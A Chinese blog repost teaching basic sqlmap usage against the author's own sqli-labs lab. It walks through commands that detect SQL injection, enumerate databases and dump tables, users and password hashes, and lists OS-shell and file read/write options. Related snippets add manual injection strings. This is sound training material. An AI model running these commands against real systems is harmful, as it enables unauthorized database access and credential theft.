sqlmap 基本使用

最新推荐文章于 2023-07-28 21:08:01 发布
最新推荐文章于 2023-07-28 21:08:01 发布
阅读量559 收藏 3
点赞数
分类专栏: ctf-web刷题之旅
原文链接:https://www.cnblogs.com/Lee-404/p/12878365.html
版权

原文

遇到SQL注入就sqlmap一把梭,有一说一,这个工具确实好用,不过还是要了解SQL注入原理,不然只能做个脚本小子,简单了解一下 https://www.cnblogs.com/Lee-404/p/12795193.html

sqlmap使用

介绍之前,先简单了解一下sqlmap的参数,可以利用 sqlmap -h 查询,这里简单介绍几个常用的

-u URL
-r 文件
–dbs 获取库名
-D 库名
–tables 获取表名
-T 表名
–columns 获取字段名
-C 字段名
–dump 获取字段值
–users 获取数据库用户
–passwords 获取数据库用户密码
–current-db 获取当前数据库
–current-user 获取当前数据库用户
–batch 跳过确认

直接注入
  1. 首先判断是否存在注入


发现id参数可控,可能有SQL注入,唆哈

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --batch

  1. 查询数据库

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --dbs --batch

其实到这一步,查哪个库已经无所谓了,因为整个数据库的内容全暴露了,可以为所欲为。一般渗透测试中到这一步就可以了,再下去要出事,不过这是我自己的靶机无所谓

  1. 查询指定数据库的表

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa --tables --batch

  1. 查询指定表的字段值

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa -T flag --columns --batch

  1. 查询值

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa -T flag -C flag --dump --batch

文本注入

从文本中保存一个HTTP请求,sqlmap会加载这个文件获取请求,通常在POST提交表单使用,这个要配合抓包软件使用,如一个文件保存着:

GET /sql/Less-1/?id=1 HTTP/1.1
Host: 192.168.43.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

sqlmap -r test.txt --batch

接下来就和直接用URL注入没区别了

其他

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --users --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --passwords --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --current-db --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --current-user --batch

参数

–level 探测等级
–is-db 当前用户是否是管理员
–roles 列处数据库管理角色
–referer HTTP referer头
–sql-shell 自定义SQL语句
–os-cmd,–os-shell 任意操作系统命令
–file-read 从服务器中读取文件
–file-write 上传文件到服务器
–tamper 加载绕过脚本

Diana_1
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP使用笔记.pdf
01-25
一、SQLMAP基本使用 SQLMAP基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
崎岖的渗透测试
hklearner的博客
06-12 732
No One Is Secure Everything Can Be Broken !​
遇事不决,一把梭哈——sqlmap
weixin_58782362的博客
07-28 464
有些网站只能在手机访问,但是sqlmap默认的访问头是电脑头,有些网站就是看文件头的base64编码注入点,需要对参数进行编码,才能进行注入。sqlmap里有自带的过滤规则。在进行post注入的时候,可以在后面加*(其实可以在数据包每行后面都加上一个*),数据包的完整性。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4642
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
树莓派开机篇
Chen_RuiMin的博客
03-30 4172
引言:本文所说的软件均已上传自蓝奏云: https://www.lanzous.com/b630454 一、格式化SD卡 SD卡插入读卡器连接电脑,使用SDFormatter对SD卡进行格式化 1、重装烧录也要进行着SD卡格式化操作 2、重装烧录时有两个盘,选择\boot这个盘,遇到失败再重新格一次) 二、下载官方镜像并烧录SD卡 1、下载官方镜像 https://www.raspberrypi...
sqli-labs通关详解
m0_52051132的博客
10-15 6871
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqlmap使用手册
12-11
1. **安装与配置**: 首先,要在本地环境中安装SQLMap,了解基本的命令行选项和配置参数。 2. **理解注入类型**: 学习不同类型的SQL注入,如基于错误的注入、基于时间的注入、联合查询注入等。 3. **实战演练**: ...
SQLmap使用1
08-03
使用SQLmap时,首先要判断目标URL是否存在注入点。这可以通过使用`-u`参数指定URL来完成,如果URL中的参数超过一个,需要用双引号括起来。例如: ``` sqlmap -u ...
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap使用手册集合
06-10
一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以执行多种操作,如数据泄露、数据库权限提升甚至...
在sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3933
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
WEB漏洞攻防 -根据应用场景进行注入-POST注入、HTTP头部注入[HOST]、XFF注入
易编橙 · 终身成长社群,相遇已是上上签!
07-28 1097
前文我们提到形成漏洞的两个必要条件是参数和可控变量;判断SQL注入时,URL地址要符合什么条件?是有参数。 之前我们利用URL内包含的参数进行注入测试,是最简单的GET方式的注入;因为可控变量的参数直接在URL的表象可以看到,我们可以直接利用。 如果说站点不通过GET传参的方式传递数据,那么该如何进行注入呢?这就是接下来我们要说的 “XFF、HTTP头、Post、Cookie注入”的方式。 由此,我们也知道了,数据的传递是讲究传递方式的
hackme靶场(getshell)
weixin_65722679的博客
06-21 199
hackme靶场(getshell)
数据表很多,sqlmap快速找出存放用户名和密码的表,一把梭
小城的博客
01-11 3745
这两天打战,突然发现了有个巨多无比数据库的sql注入漏洞,漏洞是找到了,可怎么去翻找用户名和密码存放在哪个表了? 其中一个少的数据库就已经有35个表格存在了,假设在命名没有规律的情况下如何查找呢。 可以输入sqlmap的这条语句 -D 数据库–-search -C username,password 可以看到,sqlmap把匹配到的内容全部都爬了出来,后续不要点爆破就可以了 本博客仅用于学习交流,请各位同学自行在靶场或授权站点进行测试。 ...
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1320
vulnhub-DC-9靶机渗透记录,超详细,适合新手
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7257
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7593
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
tls数据包分析
weixin_30800987的博客
08-18 647
第一步: 终端发送: 198 bytes 终端接收:2920 bytes 第二步: 终端接受:1615 bytes 终端发送:342 bytes 终端接收:75 bytes Recv 1615 bytes 61.178.105.248:30001wait to send data to POS Send 1615 bytes 192.168.43...
sqlmap基本使用方法
最新发布
08-24
SQLMap是一种常见的SQL注入工具,用于发现和利用Web应用程序中的SQL注入漏洞。它可以自动检测和利用各种类型的SQL注入漏洞,并提供了丰富的选项和功能来帮助进行渗透测试。 基本使用方法如下: 1. 安装SQLMap:你可以从官方网站下载SQLMap的最新版本,并按照官方文档中提供的说明进行安装。 2. 目标URL:使用`-u`参数指定目标URL。例如,`sqlmap.py -u http://example.com/page?id=1`。 3. 请求方法:使用`--method`参数指定请求方法,例如GET、POST或DELETE。例如,`sqlmap.py --method=GET -u http://example.com/page?id=1`。 4. 数据参数:如果目标URL是通过POST方法发送数据的,你可以使用`--data`参数指定数据参数。例如,`sqlmap.py --data="username=admin&password=123456" -u http://example.com/login`。 5. 数据库和表:你可以使用`-D`参数指定数据库名称,`--tables`参数列出数据库中的表。例如,`sqlmap.py -D dbname --tables -u http://example.com/page?id=1`。 6. 自动检测:SQLMap可以自动检测目标URL中是否存在SQL注入漏洞。你可以使用`--dbs`参数列出所有可用的数据库。例如,`sqlmap.py --dbs -u http://example.com/page?id=1`。 7. 进一步利用:一旦发现了SQL注入漏洞,你可以使用SQLMap的其他选项和功能来进一步利用漏洞,例如获取数据库中的数据、提取敏感信息等。你可以查阅SQLMap的官方文档了解更多详细的用法。 请注意,在进行任何渗透测试活动之前,确保已获得合法授权,并且仅在合法和合规的环境中使用SQLMap工具。 引用,,<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [网络安全原理与应用:SQL工具注入.pptx](https://download.csdn.net/download/u011062044/85388971)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值